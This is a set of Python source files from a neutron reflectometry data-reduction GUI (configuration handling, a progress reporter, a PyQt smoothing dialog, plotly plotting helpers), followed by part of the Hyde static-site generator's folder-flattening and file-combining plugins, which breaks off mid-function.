configuration.off_spec_slice_qz_min = self.ui.slice_qz_min_spinbox.value()
configuration.off_spec_slice_qz_max = self.ui.slice_qz_max_spinbox.value()
#try:
# qz_list = self.ui.offspec_qz_list_edit.text()
# if len(qz_list) > 0:
# configuration.off_spec_qz_list = [float(x) for x in self.ui.offspec_qz_list_edit.text().split(',')]
#except:
# logging.error("Could not parse off_spec_qz_list: %s", configuration.off_spec_qz_list)
configuration.off_spec_err_weight = self.ui.offspec_err_weight_checkbox.isChecked()
configuration.off_spec_nxbins = self.ui.offspec_rebin_x_bins_spinbox.value()
configuration.off_spec_nybins = self.ui.offspec_rebin_y_bins_spinbox.value()
configuration.off_spec_x_min = self.ui.offspec_x_min_spinbox.value()
configuration.off_spec_x_max = self.ui.offspec_x_max_spinbox.value()
configuration.off_spec_y_min = self.ui.offspec_y_min_spinbox.value()
configuration.off_spec_y_max = self.ui.offspec_y_max_spinbox.value()
# Off-spec smoothing options
configuration.apply_smoothing = self.ui.offspec_smooth_checkbox.isChecked()
# GISANS options
configuration.gisans_wl_min = self.ui.gisans_wl_min_spinbox.value()
configuration.gisans_wl_max = self.ui.gisans_wl_max_spinbox.value()
configuration.gisans_wl_npts = self.ui.gisans_wl_npts_spinbox.value()
configuration.gisans_qz_npts = self.ui.gisans_qz_npts_spinbox.value()
configuration.gisans_qy_npts = self.ui.gisans_qy_npts_spinbox.value()
configuration.gisans_use_pf = self.ui.gisans_pf_radio.isChecked()
# Make the changes persistent
configuration.to_q_settings(self.main_window.settings)
return configuration
def populate_from_configuration(self, configuration=None):
"""
Set reduction options in UI, usually after loading
a reduced data set.
"""
if configuration is None:
configuration = Configuration(self.main_window.settings)
self.ui.eventTofBins.setValue(configuration.tof_bins)
self.ui.eventBinMode.setCurrentIndex(configuration.tof_bin_type)
self.ui.use_roi_checkbox.setChecked(configuration.use_roi)
self.ui.fit_within_roi_checkbox.setChecked(configuration.update_peak_range)
self.ui.use_bck_roi_checkbox.setChecked(configuration.use_roi_bck)
self.ui.actionAutomaticXPeak.setChecked(not configuration.force_peak_roi)
self.ui.actionAutoYLimits.setChecked(not configuration.force_low_res_roi)
# Update reduction parameters
self.ui.refXPos.setValue(configuration.peak_position)
self.ui.refXWidth.setValue(configuration.peak_width)
self.ui.refYPos.setValue(configuration.low_res_position)
self.ui.refYWidth.setValue(configuration.low_res_width)
self.ui.bgCenter.setValue(configuration.bck_position)
self.ui.bgWidth.setValue(configuration.bck_width)
# Use background on each side of the peak
self.ui.use_side_bck_checkbox.setChecked(configuration.use_tight_bck)
self.ui.side_bck_width.setValue(configuration.bck_offset)
# Subtract background
self.ui.bgActive.setChecked(configuration.subtract_background)
# Scaling factor
try:
scale = math.log10(configuration.scaling_factor)
except:
scale = 0.0
self.ui.refScale.setValue(scale)
# Cut first and last points
self.ui.rangeStart.setValue(configuration.cut_first_n_points)
self.ui.rangeEnd.setValue(configuration.cut_last_n_points)
self.ui.normalize_to_unity_checkbox.setChecked(configuration.normalize_to_unity)
self.ui.normalization_q_cutoff_spinbox.setValue(configuration.total_reflectivity_q_cutoff)
self.ui.bandwidth_spinbox.setValue(configuration.wl_bandwidth)
self.ui.fanReflectivity.setChecked(configuration.use_constant_q)
self.ui.trustDANGLE.setChecked(configuration.use_dangle)
self.ui.set_dirpix_checkbox.setChecked(configuration.set_direct_pixel)
self.ui.set_dangle0_checkbox.setChecked(configuration.set_direct_angle_offset)
self.ui.directPixelOverwrite.setValue(configuration.direct_pixel_overwrite)
self.ui.dangle0Overwrite.setValue(configuration.direct_angle_offset_overwrite)
self.ui.sample_size_spinbox.setValue(configuration.sample_size)
self.ui.final_rebin_checkbox.setChecked(configuration.do_final_rebin)
self.ui.q_rebin_spinbox.setValue(configuration.final_rebin_step)
# UI elements
self.ui.normalizeXTof.setChecked(configuration.normalize_x_tof)
self.ui.xLamda.setChecked(configuration.x_wl_map)
self.ui.tthPhi.setChecked(configuration.angle_map)
self.ui.logarithmic_y.setChecked(configuration.log_1d)
self.ui.logarithmic_colorscale.setChecked(configuration.log_2d)
# Off-specular options
if configuration.off_spec_x_axis == Configuration.DELTA_KZ_VS_QZ:
self.ui.kizmkfzVSqz.setChecked(True)
elif configuration.off_spec_x_axis == Configuration.QX_VS_QZ:
self.ui.qxVSqz.setChecked(True)
else:
self.ui.kizVSkfz.setChecked(True)
self.ui.offspec_slice_checkbox.setChecked(configuration.off_spec_slice)
#self.ui.offspec_qz_list_edit.setText(','.join([str(x) for x in configuration.off_spec_qz_list]))
self.ui.slice_qz_min_spinbox.setValue(configuration.off_spec_slice_qz_min)
self.ui.slice_qz_max_spinbox.setValue(configuration.off_spec_slice_qz_max)
self.ui.offspec_err_weight_checkbox.setChecked(configuration.off_spec_err_weight)
self.ui.offspec_rebin_x_bins_spinbox.setValue(configuration.off_spec_nxbins)
self.ui.offspec_rebin_y_bins_spinbox.setValue(configuration.off_spec_nybins)
self.ui.offspec_x_min_spinbox.setValue(configuration.off_spec_x_min)
self.ui.offspec_x_max_spinbox.setValue(configuration.off_spec_x_max)
self.ui.offspec_y_min_spinbox.setValue(configuration.off_spec_y_min)
self.ui.offspec_y_max_spinbox.setValue(configuration.off_spec_y_max)
# Off-spec smoothing options
self.ui.offspec_smooth_checkbox.setChecked(configuration.apply_smoothing)
# GISANS options
self.ui.gisans_wl_min_spinbox.setValue(configuration.gisans_wl_min)
self.ui.gisans_wl_max_spinbox.setValue(configuration.gisans_wl_max)
self.ui.gisans_wl_npts_spinbox.setValue(configuration.gisans_wl_npts)
self.ui.gisans_qz_npts_spinbox.setValue(configuration.gisans_qz_npts)
self.ui.gisans_qy_npts_spinbox.setValue(configuration.gisans_qy_npts)
self.ui.gisans_pf_radio.setChecked(configuration.gisans_use_pf)
def stitch_reflectivity(self):
"""
Stitch the reflectivity parts and normalize to 1.
"""
# Update the configuration so we can remember the cutoff value
# later if it was changed
self.get_configuration()
self._data_manager.stitch_data_sets(normalize_to_unity=self.ui.normalize_to_unity_checkbox.isChecked(),
q_cutoff=self.ui.normalization_q_cutoff_spinbox.value())
for i in range(len(self._data_manager.reduction_list)):
xs = self._data_manager.active_channel.name
d = self._data_manager.reduction_list[i].cross_sections[xs]
self.ui.reductionTable.setItem(i, 1,
QtWidgets.QTableWidgetItem("%.4f"%(d.configuration.scaling_factor)))
self.main_window.initiate_reflectivity_plot.emit(False)
def trim_data_to_normalization(self):
"""
Cut the start and end of the active data set to 5% of its
maximum intensity.
"""
trim_points = self._data_manager.get_trim_values()
if trim_points is not None:
self.ui.rangeStart.setValue(trim_points[0])
self.ui.rangeEnd.setValue(trim_points[1])
self.update_tables()
self.main_window.initiate_reflectivity_plot.emit(False)
else:
self.report_message("No direct beam found to trim data", pop_up=False)
def strip_overlap(self):
"""
Remove overlapping points in the reflecitviy, cutting always from the lower Qz
measurements.
"""
self._data_manager.strip_overlap()
for i in range(len(self._data_manager.reduction_list)):
xs = self._data_manager.active_channel.name
d = self._data_manager.reduction_list[i].cross_sections[xs]
self.ui.reductionTable.setItem(i, 3,
QtWidgets.QTableWidgetItem(str(d.configuration.cut_last_n_points)))
self.main_window.initiate_reflectivity_plot.emit(False)
def report_message(self, message, informative_message=None,
detailed_message=None, pop_up=False, is_error=False):
"""
Report an error.
:param str message: message string to be reported
:param str informative_message: extra information
:param str detailed_message: detailed message for the log
:param bool pop_up: if True, a dialog will pop up
:param bool is_error: if True, the message is logged on the error channel
"""
self.status_message.setText(message)
if is_error:
logging.error(message)
if detailed_message is not None:
logging.error(detailed_message)
elif pop_up:
logging.warning(message)
else:
logging.info(message)
if pop_up:
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Warning)
msg.setText(message)
msg.setWindowTitle("Information")
if informative_message is not None:
msg.setInformativeText(informative_message)
if detailed_message is not None:
msg.setDetailedText(detailed_message)
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
def show_results(self):
"""
Pop up the result viewer
"""
from ..result_viewer import ResultViewer
dialog=ResultViewer(self.main_window, self._data_manager)
dialog.specular_compare_widget.ui.refl_preview_checkbox.setChecked(True)
self.main_window.update_specular_viewer.connect(dialog.update_specular)
self.main_window.update_off_specular_viewer.connect(dialog.update_off_specular)
self.main_window.update_gisans_viewer.connect(dialog.update_gisans)
dialog.show()
```
#### File: interfaces/event_handlers/progress_reporter.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
class ProgressReporter(object):
"""
Progress reporter class that allows for sub-tasks.
"""
def __init__(self, max_value=100, call_back=None,
status_bar=None, progress_bar=None):
"""
:param str message: message to be displayed
"""
self.max_value = max_value
self.message = ''
self.call_back = call_back
self.value = 0
self.sub_tasks = []
self.status_bar = status_bar
self.progress_bar = progress_bar
def __call__(self, value, message='', out_of=None):
"""
Shortcut to set_value() so that the object can be used
as a function to be compatible with QProgressDialog.setValue().
"""
return self.set_value(value, message, out_of)
def set_value(self, value, message='', out_of=None):
"""
Set the value of a progress indicator
:param int value: completion value, as a percentage
"""
if out_of is not None:
value = int(value / out_of * self.max_value)
value = min(value, self.max_value)
self.value = value
self.update(message)
def update(self, message=''):
"""
Updates the progress status according to
sub-tasks.
:param str message: message to be displayed
"""
_value = self.value
for item in self.sub_tasks:
_value += min(item.value, item.max_value)
_value = min(_value, self.max_value)
if self.call_back is not None:
self.call_back(message)
if self.status_bar:
self.progress_bar.setValue(_value)
if message and self.status_bar:
self.status_bar.setText(message)
def create_sub_task(self, max_value):
"""
Create a sub-task, with max_value being its portion
of the complete task. Returns a call-back function
to be called by the worker to update the progress.
:param int max_value: portion of the task
"""
sub_task_progress = ProgressReporter(max_value, self.update)
self.sub_tasks.append(sub_task_progress)
return sub_task_progress
```
#### File: interfaces/generated/ui_smooth_dialog.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(781, 608)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/General/logo.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Dialog.setWindowIcon(icon)
self.verticalLayout_2 = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(Dialog)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.kizmkfzVSqz = QtWidgets.QRadioButton(Dialog)
self.kizmkfzVSqz.setChecked(True)
self.kizmkfzVSqz.setObjectName("kizmkfzVSqz")
self.horizontalLayout.addWidget(self.kizmkfzVSqz)
self.qxVSqz = QtWidgets.QRadioButton(Dialog)
self.qxVSqz.setObjectName("qxVSqz")
self.horizontalLayout.addWidget(self.qxVSqz)
self.kizVSkfz = QtWidgets.QRadioButton(Dialog)
self.kizVSkfz.setObjectName("kizVSkfz")
self.horizontalLayout.addWidget(self.kizVSkfz)
self.verticalLayout.addLayout(self.horizontalLayout)
self.plot = MPLWidget(Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.plot.sizePolicy().hasHeightForWidth())
self.plot.setSizePolicy(sizePolicy)
self.plot.setObjectName("plot")
self.verticalLayout.addWidget(self.plot)
self.horizontalLayout_2.addLayout(self.verticalLayout)
self.widget = QtWidgets.QWidget(Dialog)
self.widget.setObjectName("widget")
self.gridLayout = QtWidgets.QGridLayout(self.widget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.gridXmax = QtWidgets.QDoubleSpinBox(self.widget)
self.gridXmax.setDecimals(6)
self.gridXmax.setMinimum(-1.0)
self.gridXmax.setMaximum(1.0)
self.gridXmax.setSingleStep(0.001)
self.gridXmax.setProperty("value", 0.01)
self.gridXmax.setObjectName("gridXmax")
self.gridLayout.addWidget(self.gridXmax, 2, 3, 1, 1)
self.sigmasCoupled = QtWidgets.QToolButton(self.widget)
icon = QtGui.QIcon.fromTheme("system-lock-screen")
self.sigmasCoupled.setIcon(icon)
self.sigmasCoupled.setCheckable(True)
self.sigmasCoupled.setChecked(True)
self.sigmasCoupled.setObjectName("sigmasCoupled")
self.gridLayout.addWidget(self.sigmasCoupled, 12, 0, 1, 1)
spacerItem = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
self.gridLayout.addItem(spacerItem, 5, 3, 1, 1)
self.sigmaY = QtWidgets.QDoubleSpinBox(self.widget)
self.sigmaY.setEnabled(False)
self.sigmaY.setDecimals(6)
self.sigmaY.setMinimum(1e-06)
self.sigmaY.setMaximum(1.0)
self.sigmaY.setSingleStep(0.00025)
self.sigmaY.setProperty("value", 0.0005)
self.sigmaY.setObjectName("sigmaY")
self.gridLayout.addWidget(self.sigmaY, 12, 3, 1, 1)
self.label_12 = QtWidgets.QLabel(self.widget)
self.label_12.setObjectName("label_12")
self.gridLayout.addWidget(self.label_12, 4, 2, 1, 1)
self.label_10 = QtWidgets.QLabel(self.widget)
self.label_10.setObjectName("label_10")
self.gridLayout.addWidget(self.label_10, 2, 2, 1, 1)
self.label_2 = QtWidgets.QLabel(self.widget)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 10, 0, 1, 1)
self.label_11 = QtWidgets.QLabel(self.widget)
self.label_11.setObjectName("label_11")
self.gridLayout.addWidget(self.label_11, 3, 2, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(20, 15, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
self.gridLayout.addItem(spacerItem1, 13, 3, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(self.widget)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 16, 0, 1, 4)
self.label_8 = QtWidgets.QLabel(self.widget)
self.label_8.setObjectName("label_8")
self.gridLayout.addWidget(self.label_8, 12, 2, 1, 1)
self.label_5 = QtWidgets.QLabel(self.widget)
self.label_5.setObjectName("label_5")
self.gridLayout.addWidget(self.label_5, 1, 0, 1, 1)
self.label_7 = QtWidgets.QLabel(self.widget)
self.label_7.setObjectName("label_7")
self.gridLayout.addWidget(self.label_7, 10, 2, 1, 1)
self.gridYmin = QtWidgets.QDoubleSpinBox(self.widget)
self.gridYmin.setDecimals(6)
self.gridYmin.setMinimum(-1.0)
self.gridYmin.setMaximum(1.0)
self.gridYmin.setSingleStep(0.001)
self.gridYmin.setObjectName("gridYmin")
self.gridLayout.addWidget(self.gridYmin, 3, 3, 1, 1)
spacerItem2 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
self.gridLayout.addItem(spacerItem2, 9, 3, 1, 1)
self.label_13 = QtWidgets.QLabel(self.widget)
self.label_13.setAlignment(QtCore.Qt.AlignCenter)
self.label_13.setObjectName("label_13")
self.gridLayout.addWidget(self.label_13, 0, 0, 1, 4)
self.label_9 = QtWidgets.QLabel(self.widget)
self.label_9.setObjectName("label_9")
self.gridLayout.addWidget(self.label_9, 1, 2, 1, 1)
self.gridYmax = QtWidgets.QDoubleSpinBox(self.widget)
self.gridYmax.setDecimals(6)
self.gridYmax.setMinimum(-1.0)
self.gridYmax.setMaximum(1.0)
self.gridYmax.setSingleStep(0.001)
self.gridYmax.setProperty("value", 0.025)
self.gridYmax.setObjectName("gridYmax")
self.gridLayout.addWidget(self.gridYmax, 4, 3, 1, 1)
self.gridSizeCoupled = QtWidgets.QToolButton(self.widget)
icon = QtGui.QIcon.fromTheme("system-lock-screen")
self.gridSizeCoupled.setIcon(icon)
self.gridSizeCoupled.setCheckable(True)
self.gridSizeCoupled.setChecked(True)
self.gridSizeCoupled.setObjectName("gridSizeCoupled")
self.gridLayout.addWidget(self.gridSizeCoupled, 8, 0, 1, 1)
self.label_3 = QtWidgets.QLabel(self.widget)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 6, 0, 1, 1)
self.label_4 = QtWidgets.QLabel(self.widget)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 8, 2, 1, 1)
self.gridSizeX = QtWidgets.QSpinBox(self.widget)
self.gridSizeX.setEnabled(False)
self.gridSizeX.setMinimum(10)
self.gridSizeX.setMaximum(1000)
self.gridSizeX.setSingleStep(10)
self.gridSizeX.setProperty("value", 200)
self.gridSizeX.setObjectName("gridSizeX")
self.gridLayout.addWidget(self.gridSizeX, 6, 3, 1, 1)
self.gridXmin = QtWidgets.QDoubleSpinBox(self.widget)
self.gridXmin.setDecimals(6)
self.gridXmin.setMinimum(-1.0)
self.gridXmin.setMaximum(1.0)
self.gridXmin.setSingleStep(0.001)
self.gridXmin.setProperty("value", -0.01)
self.gridXmin.setObjectName("gridXmin")
self.gridLayout.addWidget(self.gridXmin, 1, 3, 1, 1)
self.label_6 = QtWidgets.QLabel(self.widget)
self.label_6.setObjectName("label_6")
self.gridLayout.addWidget(self.label_6, 6, 2, 1, 1)
self.sigmaX = QtWidgets.QDoubleSpinBox(self.widget)
self.sigmaX.setDecimals(6)
self.sigmaX.setMinimum(1e-06)
self.sigmaX.setMaximum(1.0)
self.sigmaX.setSingleStep(0.00025)
self.sigmaX.setProperty("value", 0.0005)
self.sigmaX.setObjectName("sigmaX")
self.gridLayout.addWidget(self.sigmaX, 10, 3, 1, 1)
spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem3, 15, 3, 1, 1)
self.gridSizeY = QtWidgets.QSpinBox(self.widget)
self.gridSizeY.setEnabled(False)
self.gridSizeY.setMinimum(10)
self.gridSizeY.setMaximum(1000)
self.gridSizeY.setSingleStep(10)
self.gridSizeY.setProperty("value", 200)
self.gridSizeY.setObjectName("gridSizeY")
self.gridLayout.addWidget(self.gridSizeY, 8, 3, 1, 1)
self.label_14 = QtWidgets.QLabel(self.widget)
self.label_14.setObjectName("label_14")
self.gridLayout.addWidget(self.label_14, 14, 0, 1, 1)
self.rSigmas = QtWidgets.QDoubleSpinBox(self.widget)
self.rSigmas.setMinimum(1.0)
self.rSigmas.setMaximum(10.0)
self.rSigmas.setProperty("value", 3.0)
self.rSigmas.setObjectName("rSigmas")
self.gridLayout.addWidget(self.rSigmas, 14, 3, 1, 1)
self.horizontalLayout_2.addWidget(self.widget)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
self.retranslateUi(Dialog)
self.kizmkfzVSqz.clicked.connect(Dialog.drawPlot)
self.kizVSkfz.clicked.connect(Dialog.drawPlot)
self.qxVSqz.clicked.connect(Dialog.drawPlot)
self.gridSizeCoupled.clicked['bool'].connect(self.gridSizeY.setDisabled)
self.sigmasCoupled.clicked['bool'].connect(self.sigmaY.setDisabled)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
self.gridXmin.valueChanged['double'].connect(Dialog.updateSettings)
self.gridXmax.valueChanged['double'].connect(Dialog.updateSettings)
self.gridYmin.valueChanged['double'].connect(Dialog.updateSettings)
self.gridYmax.valueChanged['double'].connect(Dialog.updateSettings)
self.sigmaX.valueChanged['double'].connect(Dialog.updateSettings)
self.sigmaY.valueChanged['double'].connect(Dialog.updateSettings)
self.gridSizeCoupled.clicked.connect(Dialog.updateGrid)
self.sigmasCoupled.clicked.connect(Dialog.updateSettings)
self.gridSizeCoupled.clicked['bool'].connect(self.gridSizeX.setDisabled)
QtCore.QMetaObject.connectSlotsByName(Dialog)
Dialog.setTabOrder(self.gridXmin, self.gridXmax)
Dialog.setTabOrder(self.gridXmax, self.gridYmin)
Dialog.setTabOrder(self.gridYmin, self.gridYmax)
Dialog.setTabOrder(self.gridYmax, self.gridSizeX)
Dialog.setTabOrder(self.gridSizeX, self.gridSizeY)
Dialog.setTabOrder(self.gridSizeY, self.sigmaX)
Dialog.setTabOrder(self.sigmaX, self.sigmaY)
Dialog.setTabOrder(self.sigmaY, self.rSigmas)
Dialog.setTabOrder(self.rSigmas, self.buttonBox)
Dialog.setTabOrder(self.buttonBox, self.kizmkfzVSqz)
Dialog.setTabOrder(self.kizmkfzVSqz, self.qxVSqz)
Dialog.setTabOrder(self.qxVSqz, self.kizVSkfz)
Dialog.setTabOrder(self.kizVSkfz, self.gridSizeCoupled)
Dialog.setTabOrder(self.gridSizeCoupled, self.sigmasCoupled)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "QuickNXS - Smooth Off-Specular"))
self.label.setText(_translate("Dialog", "Off-Specular Preview"))
self.kizmkfzVSqz.setText(_translate("Dialog", "(ki_z-kf_z) VS. Qz"))
self.qxVSqz.setText(_translate("Dialog", "Qx VS. Qz"))
self.kizVSkfz.setText(_translate("Dialog", "ki_z VS. kf_z"))
self.label_12.setText(_translate("Dialog", "Y2"))
self.label_10.setText(_translate("Dialog", "X2"))
self.label_2.setText(_translate("Dialog", "Sigma"))
self.label_11.setText(_translate("Dialog", "Y1"))
self.label_8.setText(_translate("Dialog", "Y"))
self.label_5.setText(_translate("Dialog", "Grid Region"))
self.label_7.setText(_translate("Dialog", "X"))
self.label_13.setText(_translate("Dialog", "Smoothing Parameters"))
self.label_9.setText(_translate("Dialog", "X1"))
self.label_3.setText(_translate("Dialog", "Grid Size"))
self.label_4.setText(_translate("Dialog", "Y"))
self.label_6.setText(_translate("Dialog", "X"))
self.label_14.setText(_translate("Dialog", "R [Sigmas]"))
from .mplwidget import MPLWidget
import icons_rc
```
#### File: test/notebooks/plot_utils.py
```python
import numpy as np
import plotly.offline as py
import plotly.graph_objs as go
py.init_notebook_mode(connected=True)
def plot1d(data_list, data_names=None, x_title='', y_title='',
x_log=False, y_log=False, show_dx=True, width=600, height=400):
"""
Produce a 1D plot
@param data_list: list of traces [ [x1, y1], [x2, y2], ...]
@param data_names: name for each trace, for the legend
"""
from plotly.offline import plot
# Create traces
if not isinstance(data_list, list):
raise RuntimeError("plot1d: data_list parameter is expected to be a list")
# Catch the case where the list is in the format [x y]
data = []
show_legend = False
if len(data_list) == 2 and not isinstance(data_list[0], list):
label = ''
if isinstance(data_names, list) and len(data_names) == 1:
label = data_names[0]
show_legend = True
data = [go.Scatter(name=label, x=data_list[0], y=data_list[1])]
else:
for i in range(len(data_list)):
label = ''
if isinstance(data_names, list) and len(data_names) == len(data_list):
label = data_names[i]
show_legend = True
err_x = {}
err_y = {}
if len(data_list[i]) >= 3:
err_y = dict(type='data', array=data_list[i][2], visible=True)
if len(data_list[i]) >= 4:
err_x = dict(type='data', array=data_list[i][3], visible=True)
if show_dx is False:
err_x['thickness'] = 0
data.append(go.Scatter(name=label, x=data_list[i][0], y=data_list[i][1],
error_x=err_x, error_y=err_y))
x_layout = dict(title=x_title, zeroline=False, exponentformat="power",
showexponent="all", showgrid=True,
showline=True, mirror="all", ticks="inside")
if x_log:
x_layout['type'] = 'log'
y_layout = dict(title=y_title, zeroline=False, exponentformat="power",
showexponent="all", showgrid=True,
showline=True, mirror="all", ticks="inside")
if y_log:
y_layout['type'] = 'log'
layout = go.Layout(
showlegend=show_legend,
autosize=True,
width=width,
height=height,
margin=dict(t=40, b=40, l=80, r=40),
hovermode='closest',
bargap=0,
xaxis=x_layout,
yaxis=y_layout
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig, show_link=False)
def plot_heatmap(x, y, z, x_title='', y_title='', surface=False,
x_log=False, y_log=False, z_min=None, z_max=None):
"""
Produce a 2D plot
"""
from plotly.offline import plot
import plotly.graph_objs as go
x_layout = dict(title=x_title, zeroline=False, exponentformat="power",
showexponent="all", showgrid=True,
showline=True, mirror="all", ticks="inside")
if x_log:
x_layout['type'] = 'log'
y_layout = dict(title=y_title, zeroline=False, exponentformat="power",
showexponent="all", showgrid=True,
showline=True, mirror="all", ticks="inside")
if y_log:
y_layout['type'] = 'log'
layout = go.Layout(
showlegend=False,
autosize=True,
width=600,
height=500,
margin=dict(t=40, b=40, l=80, r=40),
hovermode='closest',
bargap=0,
xaxis=x_layout,
yaxis=y_layout
)
colorscale=[
[0, "rgb(0,0,131)"], [0.125, "rgb(0,60,170)"], [0.375, "rgb(5,255,255)"],
[0.625, "rgb(255,255,0)"], [0.875, "rgb(250,0,0)"], [1, "rgb(128,0,0)"]
]
plot_type = 'surface' if surface else 'heatmap'
trace = go.Heatmap(z=z, x=x, y=y, autocolorscale=False,# type=plot_type,
hoverinfo="x+y+z", colorscale=colorscale,
zauto=z_min is None, zmin=z_min, zmax=z_max)
fig = go.Figure(data=[trace], layout=layout)
py.iplot(fig, show_link=False)
def fill_dict(accum_dict, value):
if value[0] in ['#', 'File']:
accum_dict[value[0]] = value[1]
elif value[0] in ['#', 'DB_ID', 'P0', 'PN', 'dpix', 'number']:
accum_dict[value[0]] = int(value[1])
elif value[0] == 'extract_fan':
accum_dict[value[0]] = value[1] == 'True'
else:
accum_dict[value[0]] = float(value[1])
return accum_dict
def read_settings(file_path):
DATA_BLOCK = 0
DIRECT_BEAM_BLOCK = 1
DATA_RUN_BLOCK = 2
DIRECT_BEAM_HEADERS = ['#', 'DB_ID', 'P0', 'PN', 'x_pos', 'x_width',
'y_pos', 'y_width', 'bg_pos', 'bg_width',
'dpix', 'tth', 'number', 'File']
DATA_RUN_HEADERS = ['#', 'scale', 'P0', 'PN', 'x_pos', 'x_width',
'y_pos', 'y_width', 'bg_pos', 'bg_width',
'extract_fan', 'dpix', 'tth', 'number', 'DB_ID', 'File']
reduction_settings = {'direct_beam_runs': [], 'data_runs': [], 'process_type': 'Specular'}
fd = open(file_path, 'r')
current_block = DATA_BLOCK
for line in fd.readlines():
if "# Type:" in line:
toks = line.strip().split()
reduction_settings['process_type'] = toks[2]
continue
elif "[Direct Beam Runs]" in line:
current_block = DIRECT_BEAM_BLOCK
continue
elif "[Data Runs]" in line:
current_block = DATA_RUN_BLOCK
continue
elif "[Data]" in line:
break
if line.startswith('#') and current_block == DIRECT_BEAM_BLOCK:
# Skip the column names
if line.startswith('# DB_ID'):
continue
toks = line.strip().split()
if len(toks) == len(DIRECT_BEAM_HEADERS):
settings_dict = reduce(fill_dict, zip(DIRECT_BEAM_HEADERS, toks), {})
reduction_settings['direct_beam_runs'].append(settings_dict)
elif line.startswith('#') and current_block == DATA_RUN_BLOCK:
# Skip the column names
if line.startswith('# scale'):
continue
toks = line.strip().split()
if len(toks) == len(DATA_RUN_HEADERS):
settings_dict = reduce(fill_dict, zip(DATA_RUN_HEADERS, toks), {})
reduction_settings['data_runs'].append(settings_dict)
return reduction_settings
```
|
{
"source": "JeNeSuisPasDave/hyde",
"score": 2
}
|
#### File: ext/plugins/structure.py
```python
from hyde.ext.plugins.meta import Metadata
from hyde.plugin import Plugin
from hyde.site import Resource
from hyde.util import pairwalk
from fswrap import File, Folder
import os
from fnmatch import fnmatch
import operator
#
# Folder Flattening
#
class FlattenerPlugin(Plugin):
"""
The plugin class for flattening nested folders.
"""
def __init__(self, site):
super(FlattenerPlugin, self).__init__(site)
def begin_site(self):
"""
Finds all the folders that need flattening and changes the
relative deploy path of all resources in those folders.
"""
items = []
try:
items = self.site.config.flattener.items
except AttributeError:
pass
for item in items:
node = None
target = ''
try:
node = self.site.content.node_from_relative_path(item.source)
target = Folder(item.target)
except AttributeError:
continue
if node:
for resource in node.walk_resources():
target_path = target.child(resource.name)
self.logger.debug(
'Flattening resource path [%s] to [%s]' %
(resource, target_path))
resource.relative_deploy_path = target_path
for child in node.walk():
child.relative_deploy_path = target.path
#
# Combine
#
class CombinePlugin(Plugin):
"""
To use this combine, the following configuration should be added
to meta data::
combine:
sort: false #Optional. Defaults to true.
root: content/media #Optional. Path must be relative to content
folder - default current folder
recurse: true #Optional. Default false.
files:
- ns1.*.js
- ns2.*.js
where: top
remove: yes
`files` is a list of resources (or just a resource) that should be
combined. Globbing is performed. `where` indicate where the
combination should be done. This could be `top` or `bottom` of the
file. `remove` tell if we should remove resources that have been
combined into the resource.
"""
def __init__(self, site):
super(CombinePlugin, self).__init__(site)
def _combined(self, resource):
"""
Return the list of resources to combine to build this one.
"""
try:
config = resource.meta.combine
except AttributeError:
return [] # Not a combined resource
try:
files = config.files
except AttributeError:
raise AttributeError("No resources to combine for [%s]" % resource)
if type(files) is str:
files = [files]
# Grab resources to combine
# select site root
try:
root = self.site.content.node_from_relative_path(
resource.meta.combine.root)
except AttributeError:
root = resource.node
# select walker
try:
recurse = resource.meta.combine.recurse
except AttributeError:
recurse = False
walker = root.walk_resources() if recurse else root.resources
# Must we sort?
try:
sort = resource.meta.combine.sort
except AttributeError:
sort = True
if sort:
resources = sorted([r for r in walker
if any(fnmatch(r.name, f) for f in files)],
key=operator.attrgetter('name'))
else:
resources = [(f, r)
for r in walker for f in files if fnmatch(r.name, f)]
resources = [r[1] for f in files for r in resources if f in r]
if not resources:
self.logger.debug("No resources to combine for [%s]" % resource)
return []
return resources
def begin_site(self):
"""
Initialize the plugin and search for the combined resources
"""
for node in self.site.content.walk():
for resource in node.resources:
resources = self._combined(resource)
